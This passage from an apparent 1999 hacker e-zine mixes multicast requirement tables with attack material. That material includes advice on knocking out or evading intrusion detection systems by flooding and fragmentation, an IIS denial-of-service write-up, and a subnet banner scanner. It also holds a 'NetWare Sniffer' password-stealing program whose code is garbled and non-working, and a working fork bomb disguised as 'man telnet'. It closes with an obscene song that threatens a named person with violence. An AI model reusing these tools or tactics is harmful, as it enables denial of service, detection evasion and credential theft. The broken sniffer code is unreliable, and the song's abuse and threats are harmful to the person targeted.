email, message paging, facsimile, bulletin board, and newsgroups.
X.400 email is the prototypical application in this category and
is characterized by traffic that is not sensitive to throughput or
delay, but is sensitive to errors, i.e. it needs reliable transfer.
The reliability, however, may be provided immediately or delayed due
to the inability of the receiver to acknowledge in circumstances where
the return channel is disabled or unavailable. For this reason an
unreliable multicast must be provided in addition to a reliable
multicast capability. In fact, a hybrid is needed such that when a
message is multicast to a group some members of the group can be
expected to acknowledge immediately and others may have to provide
for their own reliability by enlisting the services of a logging agent
or other means.
Email could be sent between individuals or from an individual to a
group or organization. Messages of varying priority require a range
of guaranteed delivery speeds. This range, reflected in the accompanying
chart, is typically from a couple of seconds to hours.
4.1.2 Communication Requirements
Characteristic: Range of Values:
--------------------------------------------------------------------------
Group Management Known
Topology PT->MP
Scalability 100
Ordering Source
Reliability Range Absolute
QoS
Throughput 3 Mbps
Latency per-message: 2 secs. to hours
Jitter no requirement
Precedence/Priority Per-message
Reliability communication channel dependent
Capacity communication channel dependent
4.2. Text and Image File Transfer
4.2.1 Application Use
Applications in this category include image/file archive/retrieval,
the distribution of weather maps, distribution of key management
and other databases. (Also, web cache preload, software dissemination,
network news, pre-loading of a database for DIS or games). A typical
application is non-realtime bulk data transfer such as the retrieval
of an image from an archive. These applications fit a client/server in
that the receiver can be the client of a server...the transmitter.
The data flow in these applications is unidirectional. No hierarchiacal
distribution system is needed. Characteristics not (particularly)
delay sensitive but error sensitive. File sizes are great. In some
cases, files must be dealt with as monolithic. Transfers on the order
of tens of seconds are tolerated. Image files require very low error
rates. Compression is necessary. Since there is no interaction, users
do not perceive round-trip delays or excessive latencies.
4.2.2 Communication Requirements
Characteristic: Range of Values:
--------------------------------------------------------------------------
Group Management Unknown
Topology PT->MP
Scalability 1000
Ordering Source
Reliability Range k-reliability
QoS
Throughput 10 Kbps
Latency no requirement
Jitter no requirement
Precedence/Priority Per-message
Reliability communication channel dependent
Capacity communication channel dependent
4.3 Voice/Video Teleconference
4.3.1 Application Use
Voice/video teleconferences impose soft real-time constraints on the
communication system.. Latency is the principal concern because of
human perception limitations. Reliability is not a principal concern
since data is redundant and is dependent more on freshness. Loss of
video data transmission, for example, may result in slight differences
in color or a fuzzy picture. There is no state to maintain or distribute
since audio/video consists of a stream of transition states.
Depending on the quality of signals transmitted, throughput demands
can be very high. Telephony quality voice, for example, demands only
64 Kbps, while to transmit NTSC video of 30 frames a second, could
require a full FDDI level of 100 Mbits/sec. Compression is typically
used to lower this throughput requirement. The distribution of this
type of data does require the reserving of net resources for the purpose
of assuring a QoS level where, typically, latency and jitter are the
constraints.
Video teleconference requires group formation policy that allows
initiating a session, joining existing sessions, leaving a session
without tearing it down if any participants remain connected, and
terminating the session. It requires the capability to conduct a
tightly-controlled N X N session if the number of participants is
restricted; or, a loosely-controlled session in a session from 1 to
N where the number of participants may be quite large. In any case,
control over group membership must be available.
4.3.2 Communication Requirements
Characteristic: Range of Values:
------------------------------------------------------------------------
Group Management Known
Topology MP<->MP
Scalability 15
Ordering Causal
Reliability Range best effort
QoS
Throughput 64 Kbps - 1 Mbps
Latency 1 sec.
Jitter 125 ms.
Precedence/Priority per-session
Reliability communication channel dependent
Capacity communication channel dependent
4.4 Voice/Video Broadcasting
4.4.1 Application Use
The broadcasting of voice and video differs from the VTC in its
requirements since there is no need to provide a return channel
from the receives to the transmitter. The non-interactive nature
also imposes less stringent demands for latency and jitter. Digital
video and audio require periodic updates of information to prevent
the image or voice playback from degrading
4.4.2 Communication Requirements
Characteristic: Range of Values:
--------------------------------------------------------------------------
Group Management Known
Topology PT->MP
Scalability 1000
Ordering Causal
Reliability Range best effort
QoS
Throughput 64 Kbps - 1 Mbps
Latency 5 secs
Jitter 1 sec.
Precedence/Priority per-session
Reliability communication channel dependent
Capacity communication channel dependent
4.5 Interactive multimedia
4.5.1 Application Use
Collaborative work tools, planning tools and distributed whiteboards
are examples of interactive multimedia applicatons. A distributed
whiteboard is a conferencing tool that distributes pages of a
whiteboard such that any participant can draw on any page. The goal
is to have consistent views across multiple platforms, therefore, the
processes implementing the whiteboard must exchange the current state
of the data. The operations that any participant performs on a page
must be sequenced and timestamped. Each participant is both sender
and receiver. Each member is responsible for detecting loss and reporting
this to the group and for periodically informing the group of their
place in the session. Repair requests could be multicast to the group
and any member of the group could effect repair. This, in turn,
requires the members of the group to have some concept of the distance
to each participant in the group and to invoke an algorithm for repair
that minimizes responses to repairs. This can be satisfied by timestamping
the status information multicast to the group. Priority is utilized to
determine the importance of transmitting the current page, a new page,
or repairs to a previous page.
Data in these applications are characterized as reliable, duplicate
free, ordered by source, and delivered within a finite period of time.
4.5.2 Communication Requirements
Characteristic: Range of Values:
-------------------------------------------------------------------------
Group Management Known
Topology MP<->MP
Scalability 15
Ordering Causal
Reliability Range Absolute
QoS
Throughput 64 Kbps - 1 Mbps
Latency 150 ms.
Jitter .125 ms.
Precedence/Priority per-session
Reliability communication channel dependent
Capacity communication channel dependent
4.6. Time-Sensitive Data Exchange
4.6.1 Application Use
Distributed simulations, situational awareness, virutal reality gaming,
billing distribution, and the dissemination of stock quotes are examples
of real-time data exchanges in this category. Soft real-time means that
the applications are time sensitive (as opposed to hard real-time which
are time critical).
Any virtual environment among hosts in a distributed system that are
simulating the behavior of objects in that environment fit this category.
Applications like distributed gaming and virtual reality require that
terrain and environmental updates be distributed in a multicast fashion
with low packet loss and low latency. Objects in this environment are
capable of physical interaction and can sense each other by visual and
other (sensor) means.
These applications are characterized by large scale memberships which
need to share a consistent view of the game space even in the face of
packet loss. In entertainment scenarios the number of simulated
objects could exceed 100,000 where each object produces a realtime
flow of 15 packets per second. Unlike applications like
videoconferencing, these applications cannot tolerate frequent
updates of data to guarantee freshness. Freshness is required yet
updates necessarily are infrequent for objects like terrain updates.
These applications are intended to work with input to and output
from humans interacting with distributed simulators in real time.
Human perception is the normal quantifier of latency requitements
(approx. 100 milliseconds).
Loss rates are stringent but not zero which means that semi-reliable
transfer may suffice. Latency must be predictable on the order of a
few hundred milliseconds and jitter must not exceed a few milliseconds.
There must be support for reserving network resources. Group
communication must allow all participants to transmit to all other
participants and the group management must allow hundreds of participants
to join/leave in less than a second.
4.6.2 Communication Requirements
Characteristic: Range of Values:
--------------------------------------------------------------------------
Group Management Known
Topology MP<->MP
Scalability 100,000
Ordering Causal
Reliability Range Absolute
QoS
Throughput 45 Mbps - 600 Mbps
Latency 150 ms.
Jitter .125 ms.
Precedence/Priority per-message
Reliability communication channel dependent
Capacity communication channel dependent
4.7. Time-Critical Data Exchange
4.7.1 Application Use
Air traffic control, realtime sensor systems, and combat data systems
are examples of applications in this category.
4.7.2 Communication Requirements
Characteristic: Range of Values:
--------------------------------------------------------------------------
Group Management Known
Topology MP<->MP
Scalability 500
Ordering Causal
Reliability Range Absolute
QoS
Throughput kbps-Mbps
Latency 20 ms.
Jitter 10 ms.
Precedence/Priority per-session
Reliability communication channel dependent
Capacity communication channel dependent
4.8 Replicated Data Base
4.8.1 Application Use
The distributed process control or replicated database are in this
category. The distinguishing requirement is the need for total order.
Application tasks could be divided among processors in a system and
data replicated to protect against failures. There is a need to
coordinate the tasks and reach consensus on state. Manufacturing
process control needs to schedule processes distributed across the
system. A consistent database is necessary to reach consensus.
4.8.2 Communication Requirements
Characteristic: Range of Values:
------------------------------------------------------------------------
Group Management Known
Topology MP<->MP
Scalability 100,000
Ordering Total
Reliability Range Absolute
QoS
Throughput 56 Kbps - 1 Mbps
Latency 1 sec
Jitter 10 ms.
Precedence/Priority per-message
Reliability communication channel dependent
Capacity communication channel dependent
[-------------------------------------]
kv[6]; /* Intrusion Detection Systems......................ProtocolD */
INTRODUCTION
Intrusion Detection Systems or commonly known
as IDS is a relatively new type of technology.
In short, IDS simply listens for known 'hack'
signatures real-time within the data packets.
Currently there are two types of IDS systems on
the market. These are Network Based IDS and Host
Based IDS. This article will attempt to explain
what the difference between Network and Host based
IDS. Although there are many ways to analyze traffic
on a network IDS, I will explore the possibilities
of evading one of these methods that uses a method
known as 'passive network packet capture' (sniffing).
NETWORK IDS :
This method of detection puts your network card ]
into promiscuous mode and sniffs all traffic
going by on the wire.
Problems
Due to the fact that it must analyze all traffic
passing by, many claim that it cannot be done on a
high-speed link effectively on a saturated link without
dropping packets. Because it sniffs the traffic, it
can only analyze the traffic on its own segment. Thus,
in a switched environment, you will require an IDS on each
segment.
HOST IDS :
This method only examines only the traffic destined to itself.
Problems:
Can only analyze the traffic destined to itself.
This method requires a client on each host and can
become costly.
METHODS OF (Network Based)
The first problem of course relies on the ability
of first detecting a Network IDS system. This is
possible by attempting to detect if there are any
systems on the network in promiscuous mode. If this
is detected, it could either be a sniffer or a network
based IDS. Either way, your goal would be to take down
this system or flood it to the point where packets begin
to be dropped. Currently there are utilities out there
that attempts to detect network cards in promiscuous mode.
TAKE-DOWN
Many sniffer-based IDS systems will fail open.
Once this happens, the attacker can continue on to it's
targeted host. This can be accomplished through any
number of DoS attacks. It should be noted that some systems
are resistant to Dos attacks.
EVASION
** By-Pass via Flood
If the network based IDS cannot be taken off line. Another
possible approach Would be to flood the system to the point
where it is dropping packets. Once this occurs, it may be
possible to then send the actual attack to the desired target
with hopes that the IDS system will drop the packet and
therefore not be able to detect the signature contained
within it.
** Forgery & Fragmentation
Typically an IDS system examines packets and compares
it's contents to known attack signatures. If the packet
can be forged or fragmented properly, it then may be possible
to by-pass the IDS. Many IDS's cannot reassemble fragmented
packets and compare them to it's list of signatures, thus
allowing malicious attack by. Once the packet reaches the
destined host, the packets are reassembled and a successful
attack is made.
SUMMARY
Basically there are problems associated with each of
these technologies. Ideally, the best solution would
have a both network & host based IDS. It should also be
noted that various types of IDS's provide many types of
Alerting when particular types of attacks occur. This
could be in the form of an e-mail, page or SNMP alert.
So, if you decide to attempt to DoS the system, an alert
of the event still might be made thus alerting them of
suspicious activity. Also note that one method of preventing
an IDS from being detected and or being taken down is by
assigning the network card an address of 0.0.0.0 This
will still enable it to sniff the traffic without being
detected and have no way of directing an attack directly at
the system. It will then use a second network card to send
off any alerts or alarms. This second network card is not in
promiscuous mode. With this type of design, it makes it difficult
to detect and disable the IDS system.
[-------------------------------------]
kv[7]; /* Another IE Exploit?.................................ntwak0 */
Potential DoS Attack on NT box with port 80 open
Jul 15 17:37:21 1999
(By NtWaK0 , slackette ) LOU Efnet #legions
Exploit Plat-Form :
I did try on NT server 4.0 + IE5 but i am sure it will work with IE4
Exploit Description :
All that you need to have is a box with 9x or NT + IE5 on it. Even FULLY
patched with, the box test was a server that run FTP anonymous and port
80
was open and an ASP pages on that web. The tester may be able to use
either
NT or 9x to facilitate this exploit.
Narrative will follow detailing steps taken.
1- Open IE5 or IE4 and Click option, then Security, NO to Cookie to
activex
and to java. In other word put your security to Maximum
2- From the start Menu Click START then RUN.
3- Type the IP address example <http://11.11.11.11/> hit enter
4-If the remote page has an asp page you will see your title bar
switching
between the two asp's. And your IE title bar will go nuts and you will
start
getting packets from the remote server.
This is what i recieved from sniffer when the server started sending.
The
default page didn't load and never loaded. If you do not stop IE you
will
recieve those packets numerous times and your link will be substantially
slowed.
GET /default.asp 47 45 54 20 2f 64 65 66 61 75 6c 74 2e 61 73 70
? HTTP/1.1.. 3f 20 48 54 54 50 2f 31 2e 31 0d 0a
Accept: image/gi 41 63 63 65 70 74 3a 20 69 6d 61 67 65 2f 67 69
f, image/x-xbitm 66 2c 20 69 6d 61 67 65 2f 78 2d 78 62 69 74 6d
ap, image/jpeg, 61 70 2c 20 69 6d 61 67 65 2f 6a 70 65 67 2c 20
image/pjpeg, app 69 6d 61 67 65 2f 70 6a 70 65 67 2c 20 61 70 70
lication/vnd.ms- 6c 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 6d 73 2d
powerpoint, appl 70 6f 77 65 72 70 6f 69 6e 74 2c 20 61 70 70 6c
ication/vnd.ms-e 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 6d 73 2d 65
xcel, applicatio 78 63 65 6c 2c 20 61 70 70 6c 69 63 61 74 69 6f
n/msword, */*.. 6e 2f 6d 73 77 6f 72 64 2c 20 2a 2f 2a 0d 0a
Accept-Language: 41 63 63 65 70 74 2d 4c 61 6e 67 75 61 67 65 3a
en-us.. 20 65 6e 2d 75 73 0d 0a
Server: Microsof 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66
t-IIS/4.0.. 74 2d 49 49 53 2f 34 2e 30 0d 0a
Date: Thu, 15 Ju 44 61 74 65 3a 20 54 68 75 2c 20 31 35 20 4a 75
l 1999 21:11:12 6c 20 31 39 39 39 20 32 31 3a 31 31 3a 31 32 20
Host: 000.000.00 08 0f 00 70 3a 00 32 30 37 00 32 35 00 2e 30 30
00.. 32 0 30 30 0d 0a
Connection: Keep 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70
5-Someone could code a program to exploit this infraction, being able to
generate a Denial of Service attack on the remote box or on the local
box
where you have memory consumption. Due to packets received from the
remote
site.
6-If you also run sniffer you will see what the server is sending . I
received about 2 Meg of data from the server. The page never loaded, and
the
only way to stop that data is to close IE.
Exploit Code :
N/A
Exploit Fix :
N/A
+---------------oOOo-(NtWaK0)-oOOo--------------------------------+
[-------------------------------------]
kv[8]; /* tryseg.c............................................guidob */
// Test for catching the SIGSEGV or SIGBUS without crashing
// and combined with try{}catch(){}
// Guido Bakker 1999 <guidob@synnergy.net>
#include <iostream.h>
#include <signal.h>
#include <stdlib.h>
#include <siginfo.h>
struct report {
int err;
int sig;
int critval;
} page1 = { 0, 0, 0 };
void notwithme(int);
int beyond(int);
int main(){
int i;
try{
sigset(SIGSEGV,notwithme);
sigset(SIGBUS,notwithme);
for(i=10000;;i++){
beyond(i);
cout << "Survifed beyond i = " << i << endl;
}
}
catch(report& seite1){
cout << "Yes we made it into the catch()" << endl;
cout << "seite1.err is: " << seite1.err << endl;
cout << "seite1.sig is: " << seite1.sig << endl;
cout << "seite1.critval is: " << seite1.critval << endl;
return(0);
}
catch(...){
cout << "Came to the second catch()" << endl;
return(1);
}
cout << "After the catch block" << endl;
return(1);
} // end of main()
int beyond(int i){
int a[50];
page1.critval = i;
// Main operation which causes an unforseen error
a[i]=1;
return(1);
}
void notwithme(int sig){
psignal(sig, "Function notwithme() got signal: ");
page1.err = 1;
page1.sig = sig;
throw page1;
return;
}
[-------------------------------------]
kv[9]; /* match.c..............................................icesk */
/* by icesk HEH damn i think i've released to many scanners :> */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <string.h>
#include <signal.h>
#define TIMEOUT 3
void al4rm(int sig);
int main(int argc,char **argv)
{
struct sockaddr_in thaddr;
int unf, i;
char buf3r[1024], hozt[1024];
if(argc != 4)
{
printf("icesk; %s [ip mask] [port] [searchword]\n",argv[0]);
exit(0);
}
for(i=1;i<255;i++)
{
if( (unf = socket(AF_INET, SOCK_STREAM, 0) ) == -1)
{
printf("c4nt g3t s0ck3t!#@\n");
}
thaddr.sin_family = AF_INET;
thaddr.sin_port = htons(atoi(argv[2]));
thaddr.sin_addr.s_addr = inet_addr(hozt);
bzero(&(thaddr.sin_zero), 8);
sprintf(hozt,"%s.%d", argv[1], i);
signal(SIGALRM, &al4rm);
alarm(TIMEOUT);
connect(unf, (struct sockaddr *)&thaddr, sizeof(struct sockaddr));
recv(unf,buf3r,sizeof(buf3r),0);
if(strstr(buf3r, argv[3]) != NULL)
{
printf("[%s!%s]; *MATCH*\n", hozt, argv[2]);
}
strcpy(buf3r,"unf");
}
}
void al4rm(int sig)
{
}
[-------------------------------------]
kv[10]; /* netsniff.c (reprint)..............................mnemonic */
------------------------------ begin here ------------------------------
/* NetWare Sniffer 1.0 written by Mnemonic */
#include <malloc.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include "structs.h" /* this is at the bottom of my notes in kv5 */
void GetMyAccountPassword();
int main()
{
char imthinkn;
printf("NetWare Sniffer is copyright 1998 Mnemonic, little buddy\n");
printf("Would you like to (a) get the password for the account you're\n");
printf("on now, (b) get the password of another user or application\n");
printf("or (c) quit? ", imthinkn);
switch(imthinkn)
case 'a': case 'A':
GetMyAccountPassword()
break;
case 'b': case 'B':
GetObjectData()
break;
case 'c': case 'C':
return 3;
}
FORWARD int GetUserAndAppInfo(char *argv[], int nMaxArgs, OBJECT *pObject,
APPLICATION_OBJECT *aop);
extern int RetrieveApplicationData(APPLICATION_OBJECT *aop);
extern FS_CONNECTION_INFO *GetConnInfo(WORD wConnectionNumber);
FORWARD OBJECT *GetObjectData(char *pszObjectName, WORD wObjectType);
GLOBAL OBJECT *GetObjectData(char *pszObjectName, WORD wObjectType)
{
int nIndex;
int nNumberObjects = 0;
OBJECT *pObject = NULL;
OBJECT obj;
int nCompletionCode;
obj.oid = -1L; /* initial value for scanbinderyobject.
must be -1L, gets updated by the function.*/
for (;;)
{
nCompletionCode = ScanBinderyObject(pszObjectName, wObjectType, &obj.oid,
obj.szObjectName, &obj.wObjectType, &obj.byPropertiesFlag, &obj.byObjectFlag,
&obj.byObjectSecurity);
if (nCompletionCode != SUCCESSFUL) /* problem or finished */
{
if (nCompletionCode != NO_SUCH_OBJECT)
{
if (pObject != NULL)
free(pObject);
errno = nCompletionCode;
return NULL;
}
break;
}
nIndex = nNumberObjects++;
pObject = (OBJECT *)
realloc(pObject, (nNumberObjects * sizeof (OBJECT)));
if (pObject == NULL)
return NULL;
/* do structure assignment to fill array element. */
pObject[nIndex] = obj;
} /* end for (;;) */
/* add dummy element */
pObject = (OBJECT *)
realloc(pobject, ((nNumberObjects + 1) * sizeof (OBJECT)));
if (pObject != NULL)
/*zero out of the dummy element. */
memset(&pObject[nNumberObjects], '\0', sizeof (OBJECT));
if (nNumberObjects == 0)
errno = NO_SUCH_OBJECT;
GetUserAndAppInfo()
}
GLOBAL int GetUserAndAppInfo(char *argv[], int nMaxArgs, OBJECT *pObject)
{
/*GetConnectionNumber() returns a value rather than an error code so
we can use it as an input parameter to GetConnInfo(). */
if (pFSConnInfo == NULL)
return -1;
strcpy(aop->obj.szObjectName, argv[nMaxArgs - 2]);
aop->obj.wObjectType = OT_APPLICATION;
strcpy(aop->szPassword, argv[nMaxArgs - 1]);
fread(&szPassword, sizeof(int), 1, inpf);
printf("\nThe password for that account is ", szPassword, "\n");
printf("\nAnd don't forget.. NetWare Sniffer is copyright 1998 Mnemonic\n");
main()
return 2;
}
}
void GetMyAccountPassword(char *argv[], int nMaxArgs, OBJECT *pObject)
{
FS_CONNECTION_INFO *pFSConnInfo;
pFSConnInfo = GetConnInfo(GetConnectionNumber());
if (pFSConnInfo == NULL)
return -1;
/*we have the user information in pFSConnInfo->fsLoggedObject.boj.*/
*pObject = pFSConnInfo->fsLoggedObject.obj;
free9pFSConnInfo);
strcpy(aop->obj.szObjectName, argv[nMaxArgs - 2]);
aop->obj.wObjectType = OT_APPLICATION;
strcpy(aop->szPassword, argv[nMaxArgs - 1]);
fread(&szPassword, sizeof(int), 1, inpf);
printf("\nThe password for the account you're on is ", szPassword, "\n");
printf("\nAnd don't forget.. NetWare Sniffer is copyright 1998 Mnemonic\n");
main()
return 1;
}
}
------------------------------- end here -------------------------------
NetWare Sniffer allows you to do one of two things. You can get the
password for the account you're on, or get the password for another
object. NWS actually retrieves the 128-byte segment which represents an
object's password, and then converts this binary string into text.
To receive the password to the account you're on, we use functions in the
Connection Services. So we can call GetConnectionNumber() to get the
number that the file server has assigned to this workstation's connection
and call GetConnInfo() to get the name of the user among other information
including the password.
To get the password for another object we first have to get the name of
the object. NWS uses the function GetObjectData() which uses
ScanBinderyObject() to populate a structure of type OBJECT.
ScanBinderyObject() can be used to retrieve data for more than one object
at a time, but will probably end up screwing things up if you try it. The
object name argument can contain wildcards (* or ?), and the object type
may be passed as OT_WILD. An object name of * and an object type of
OT_WILD means return every object in the bindery, which will also screw
you up. Because of this, GetObjectData() returns a pointer to an array of
OBJECT structures. The last element is a dummy with all fields cleared to
0. NWS then uses GetUserAndApplicationData() to retrieve the password.
The bindery is a database where NetWare keeps information about the
network resources and users that many function groups use to store and
retrieve information. Each file server on a network system has its own
bindery, and thus its own group of known objects.
The bindery represents objects using object IDs, which are
system-generated long (four-byte) integers. NetWare stores them in
high-low order. The object ID serves as a handle to object information.
The object type identifies the role the object plays in the network
environment. Novell reserves type numbers up to 0x8000 for well-known
types. Each object may in turn possess identifying characteristics, known
as properties. Properties can either be items, which are stored as
128-byte segments of unformatted data, or sets, which are listed of object
IDs. Properties are either static or dynamic, and have read/write security
protection. Properties have these attributes:
The property name is a character string of up to 16 characters, including
the null terminator. Property names have the same restrictions on use of
characters as object names.
The property flags are stored as a one-byte field. They indicate whether
the property is static or dynamic, and whether it is an item or a set.
Item properties are unformatted binary fields stored in 128-byte segments
which are interpreted by applications or NetWare APIs. Sets are lists of
object IDs; these are interpreted by NetWare.
The property security plays the same role for properties as for objects.
The values flag indicates whether the property has been assigned a value.
Properties are dependant on objects, which have these attributes:
OBJECT ID
OBJECT NAME
OBJECT TYPE
OBJECT FLAG
OBJECT SECURITY
PROPERTIES FLAG
There are two ways of identifying objects. You can use the OBJECT ID or
the OBJECT
NAME and OBJECT TYPE.
These are the properties attributes:
OBJECT ID
PROPERTY NAME
PROPERTY FLAGS
PROPERTY SECURITY
VALUES FLAG
NetWare stores items and sets as 128-byte segments of binary data. With
item data, a segment contains anything an application wants it to, with
set data, a segment holds 32 object IDs. An item property can only be
represented as a variable-length binary, or RAW, column. The only other
column that we need is the object ID, so we know who the property belongs
to.
The structure of the set property table comes clear if we think about what
it represents. For example, the properties GROUPS_I'M_IN and GROUP_MEMBERS
are used by NetWare to track group membership. A user object may belong to
any number of groups. A user group object may contain any number of users.
These properties express a relationship of the OBJECTS table with itself.
PASSWORD is of type item, and would be structured thus:
OBJECT ID
SEGMENTS
DATA
A set property is just an array of OBJECT_IDs. With both item properties
and set properties, we don't know how many segments we will retrieve, so
we declare pointers to the values, which we will allocate memory for.
------------------------------ begin here ------------------------------
/* structs.h */
#define MSC 510
#define LINT_ARGS
/* netware's prolog.h still thinks it's working with microsoft c 4.0 */
#include <prolog.h>
#include <nit.h>
#include <niterror.h>
#include <nxt.h>
#ifndef TRUE
#define TRUE 1
#endif
#ifndef FALSE
#define FALSE 0
#endif
#define FORWARD extern
#define LOCAL static
#define GLOBAL
#define MAX_OBJECT_NAME_LENGTH 48
#define MAX_PROPERTY_NAME_LENGTH 16
#define SEGMENT_SIZE 128
#define MAX_DIRECTORY_LENGTH 255
#define OT_APPLICATION 0x8001 /* our new object type */
typedef long OBJECT_ID; /* this has to go here */
#define OBJECTS_PER_SEGMENT (SEGMENT_SIZE / sizeof (OBJECT_ID))
typedef int BOOL;
typedef BYTE SEGMENT[SEGMENT_SIZE];
typedef struct _OBJECT_
{
char szObjectName[MAX_OBJECT_NAME_LENGTH];
WORD wObjectType;
OBJECT_ID oid;
BYTE byObjectFlag;
BYTE byObjectSecurity;
BYTE byPropertiesFlag;
} OBJECT;
typedef struct _ITEM_PROPERTY_
{
int nSegments;
BYTE *pValue;
} ITEM_PROPERTY;
typedef struct _PROPERTY_
char szPropertyName[MAX_PROPERTY_NAME_LENGTH];
BYTE byPropertyFlags;
BYTE byPropertySecurity;
BYTE byValuesFlag;
union
{
ITEM_PROPERTY iProperty;
OBJECT_ID *pObjectList;
} uPropertyValue;
} PROPERTY;
typedef struct _OBJECT_INFO_
{
OBJECT obj;
PROPERTY *pObjectProperties; /* array of unknown size */
} OBJECT_INFO;
typedef struct _APPLICATION_OBJECT_
{
OBJECT obj;
char szPassword[SEGMENT_SIZE];
WORD wMaximumUsers;
char szApplicationDirectory[2 * SEGMENT_SIZE];
OBJECT_ID *pAllowedUsers;
OBJECT_ID *pCurrentUsers;
} APPLICATION_OBJECT;
typedef char SERVER_NAME[MAXOBJECT_NAME_LENGTH];
typedef struct _WS_CONNECTION_
{
BYTE byInUseFlag;
BYTE byOrderNumber;
BYTE byNetworkNumber[4];
BYTE byNodeAddress[6];
BYTE bySocketNumber[2[;
BYTE byReceiveTimeOut[3];
BYTE byRoutingNode[6];
BYTE byPacketSequenceNumber;
BYTE byConnectionNumber;
BYTE byConnectionStatus;
BYTE byMaximumTimeOut[2];
BYTE byPadding[5];
} WS_CONNECTION;
typedef struct _WS_TABLE
{
SERVER_NAME szServerName;
WS_CONNECTION wsc;
} WS_TABLE;
typedef struct _FS_CONNECTION_
{
WORD wConnectionNmber;
IPXAddress SationAddres;
BYTE byRoutingNode[6];
} FS_CONNECTION;
typedef struct _NW_DATE_AND_TIME_
{
BYTE byYear; /* 0 to 99; less than 80 is in the 21st century */
/* yes I do realize that when we hit 2000 my program */
/* will screw up and stuff */
BYTE byMonth;
BYTE byDay;
BYTE byHour;
BYTE byMinute;
BYTE bySecond;
BYTE byDayOfWeek; /* 0 to 6, 0 is sunday */
} NW_DATE_AND_TIME;
typedef struct _FS_LOGGED_OBJECT_
{
WORD wConnectionNumber;
OBJECT obj;
NW_DATE_AND_TIME nwdtLoginTime;
} FS_LOGGED_OBJECT;
typedef struct _FS_CONNECTION_INFO_
{
FS_CONNECTION fsConnection;
FS_LOGGED_OBJECT fsLoggedObject;
} FS_CONNECTION_INFO;
#include "blahblah.dec"
------------------------------- end here -------------------------------
------------------------------ begin here ------------------------------
/*
* blahblah.dec - this thing's gonna be used for other stuff I write too
*/
/* gotta have all o' this stuff to define the types, and also
for use in a program that will be in a later kv issue */
extern void AddApplication(void );
extern void AllowedUsers(int nAction);
extern int BinderyCheckCode(int nCompletionCode);
extern int CheckObject(OBJECT *pObject, char *pszObjectPassword);
extern int CheckCommandLineArgs(char * *argv, int argc, int nMaxArgs);
extern int CountCurrentUsers(APPLICATION_OBJECT *aop);
extern void CurrentUsers(void );
extern void DeleteApplication(void );
extern int DeleteObject(OBJECT *pObject);
extern int DeleteObjectProperty(OBJECT *pObject, PROPERTY *pProperty);
extern OBJECT *DestroyObject(OBJECT *pObject);
extern PROPERTY *DestroyObjectProperty(PROPERTY *pProperty, unsigned short wProperties);
extern int GetApplication(APPLICATION_OBJECT *aop);
extern int GetUserAndAppInfo(char * *argv, int nMaxArgs, OBJECT *pObject, APPLICATION_OBJECT *aop);
extern int GetItemOrSet(OBJECT *pObject, PROPERTY *pProperty);
extern OBJECT *GetObjectData(char *pszObjectName, unsigned short wObjectType);
extern OBJECT_INFO *GetAllObjectInfo(char *pszObjectName, unsigned short wObjectType);
exern PROPERTY *GetObjectPropertyData(OBJECT *pObject, char *pszPropertyName);
extern int IsUserAllowed(OBJECT *pObject, APPLICATION_OBJECT *aop);
extern int IsUsingApplication(OBJECT *pObject, APPLICATION_OBJECT *aop);
extern int IsValidName(char *pszObjectName, unsigned short wMaxLength);
extern void KillNewLine(char *pszString);
extern void ListUsers(APPLICATION_OBJECT *aop, int nUserType);
extern int LinkObjectsInSet(OBJECT *pOwner, OBJECT *pMember, char *pszSetName);
extern int RetrieveApplicationData(APPLICATION_OBJECT *aop);
extern int SetItemProperty(OBJECT *pObject, PROPERTY *pProperty);
extern int SetObjectData(OBJECT *pObject);
extern int SetObject PROPERTYData(OBJECT *pObject, PROPERTY *pProperty);
extern int RemoveObjectFromSet(OBJECT *pOwner, OBJECT *pMember, char *pszSetName);
extern void UpdateApplication(void );
extern int WriteAppDirectory(APPLICATION_OBJECT *aop);
extern FS_CONNECTION_INFO *GetConnInfo(unsigned short wConnectionNumber);
extern FS_CONNECTION_INFO *GetObjectConnInfo(OBJECT *pObject);
extern WS_TABLE *GetWSTables(void );
extern void VerifyLoginStatus(APPLICATION_OBJECT *aop);
extern int DirCheckCode(int nCompletionCode);
extern void DeleteApplication(void );
extern int CountCurrentUsers(APPLICATION_OBJECT *aop);
------------------------------- end here -------------------------------
kv[11]; /*Liberty............................................guidob */
/*
liberty - this will fill up all available swap and memory
if no ulimit is set in the kernel, most unix systems
that is, it works on all unix systems with local access
(at least, the ones i tried)
no more activity is possible after a few seconds this is
activated. - guidob
*/
#include <stdio.h>
#define BUF 4096
int main(int argc, char *argv[]) {
strcpy(argv[0], "man telnet\0");
printf("funky malloc() fork() weirdness\n");
printf("by guidob and CoolVibe\n");
do_malloc(BUF);
exit(0);
}
int do_malloc(int buf) {
fprintf(stderr, "Doing %d bytes of funky malloc() weirdness\n", buf);
printf("put this in the background and logout ;)");
if(fork()) {
while(1) {
fork();
malloc(buf);
}
}
}
[-------------------------------------]
kv[12]; /* Rootfest '99 Review.................................lothos */
kv[13]; /* Ode to JP.......................................krankshaft */
Ode to JP
(sang to the tune of "Ode to My Car, by Adam Sandler")
written by KrankShaft of Legions of the Underground
loved by everyone
Here we go...
Piece of shit media whore
I know a piece of shit whore
That fuckin' sellout
Won't get very far
He's a big piece of shit
He's bound to get fucking shot
JP's going to get broken
I'll tie him in a knot
(He's a piece of shit)
I can't see why he does it
He must be smoking crack
And he smells real bad
Everyone thinks he's really wack
(He's a piece of shit)
Piece of shit media whore
(He's a piece of shit whore)
He sucks royal dick
That fuckin' pile of shit
100% crap
No he won't get very far
Fuck you whore
He's got no friends, and his site is totally jacked
Whoever likes him can lick my sweaty nuck sack
(They can bite my ass too)
And he's got no fucking skills
He'd give anyone a blow
Just to hear them say, "I want to be like you, asshole"
(You fuckin piece of shit)
(Piece of shit media whore)
I know a piece of shit whore
(JP's a piece of shit whore)
I told him to suck my ass
(That fuckin pile of shit)
That pile of sold-out shit
(He never gets very far)
Oh now what the fuck did he do
What the fuck did he do
What the fuck did he do
To get in the news
You're going to be black and blue
Don't even try to sue
You better try something new
Oh fuck JP
Well he lies like a fucking rug
JP always fucking stalls
And he's gonna get a fat lip
And a swift kick to the balls
(Ouch ouch ouch)
Plus he tries to get everyone busted
